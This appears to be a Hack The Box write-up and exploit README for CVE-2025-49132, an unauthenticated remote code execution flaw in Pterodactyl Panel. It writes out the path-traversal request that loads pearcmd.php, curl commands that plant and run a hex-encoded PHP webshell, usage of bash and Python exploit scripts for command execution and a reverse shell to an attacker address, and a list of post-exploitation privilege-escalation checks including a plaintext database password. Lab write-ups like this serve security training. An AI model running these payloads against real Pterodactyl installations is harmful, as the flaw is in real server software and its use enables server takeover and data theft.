
Exploit for CVE-2025-49132 targeting Pterodactyl Panel, combining path traversal with PEAR command injection for unauthenticated remote code execution. Includes bash and Python scripts for command execution, reverse shells, and privilege escalation guidance.
HTB Season 10 - Pterodactyl Machine Writeup
Target: Pterodactyl HTB Machine (Medium Difficulty)
CVE: CVE-2025-49132
Severity: Critical (CVSS 9.8)
Attack Type: Unauthenticated Remote Code Execution
Affected: Pterodactyl Panel < v1.11.11
This exploit chain combines:
Pterodactyl Panel's /locales/locale.json endpoint allows path traversal through the locale parameter:
GET /locales/locale.json?locale=../../../../../../usr/share/php/PEAR&namespace=pearcmd
This can be chained with PEAR's pearcmd.php to:
/tmpPEAR (PHP Extension and Application Repository) has a CLI tool (pearcmd.php) that:
config-create command that writes filesThe Exploit Chain:
Path Traversal → Load pearcmd.php → Inject PHP via config-create → Execute malicious PHP
Commands are hex-encoded using hex2bin() to bypass:
Example:
Command: whoami
Hex: 77686f616d69
Payload: <?=system(hex2bin('77686f616d69'))?>
Method 1: Using provided exploit.sh
chmod +x exploit.sh
# Get user flag
./exploit.sh flag
# Execute commands
./exploit.sh cmd "whoami"
./exploit.sh cmd "cat /etc/passwd"
# Reverse shell
nc -lvnp 4444 # On attacker machine
./exploit.sh shell 10.10.14.21 4444
Method 2: Manual exploitation
# Step 1: Write PHP shell (hex-encoded "whoami")
curl -g "http://panel.pterodactyl.htb/locales/locale.json?\
+config-create+/&\
locale=../../../../../../usr/share/php/PEAR&\
namespace=pearcmd&\
/<?=system(hex2bin('77686f616d69'))?>+/tmp/shell.php"
# Step 2: Execute
curl "http://panel.pterodactyl.htb/locales/locale.json?\
locale=../../../../../tmp&\
namespace=shell"
Method 3: Python script
I added exploit.py
**Install requests**
Full-featured bash exploit
./exploit.sh cmd "whoami" # Execute single command
./exploit.sh shell 10.10.14.21 4444 # Reverse shell
./exploit.sh flag # Find user flag
Features:
Comprehensive technical documentation
Contains:
# 1. Add to /etc/hosts
echo "10.10.x.x pterodactyl.htb panel.pterodactyl.htb" | sudo tee -a /etc/hosts
# 2. Download exploit
wget https://your-repo/exploit.sh
chmod +x exploit.sh
# 3. Get shell
nc -lvnp 4444 # Terminal 1
./exploit.sh shell 10.10.14.21 4444 # Terminal 2
# 4. Get user flag
cat /home/phileasfogg3/user.txt
# Check running services
ss -tlnp
# Found:
# 127.0.0.1:3306 - MySQL (root)
# 127.0.0.1:6379 - Redis
# 127.0.0.1:9000 - PHP-FPM (root)
# 127.0.0.1:25 - Postfix
# Check sudo
sudo -l
# (Likely requires password)
# SUID binaries
find / -perm -4000 2>/dev/null
# Cron jobs
cat /etc/crontab
ls -la /etc/cron.*
mysql -u pterodactyl -pPteraPanel
# Check for UDF injection, file write perms
# Check for FPM exploitation (CVE-2019-11043 or config abuse)
# Check for auth bypass, RCE via cron
redis-cli -h 127.0.0.1
find /etc/cron* -writable 2>/dev/null
uname -a
# Check for DirtyCow, etc.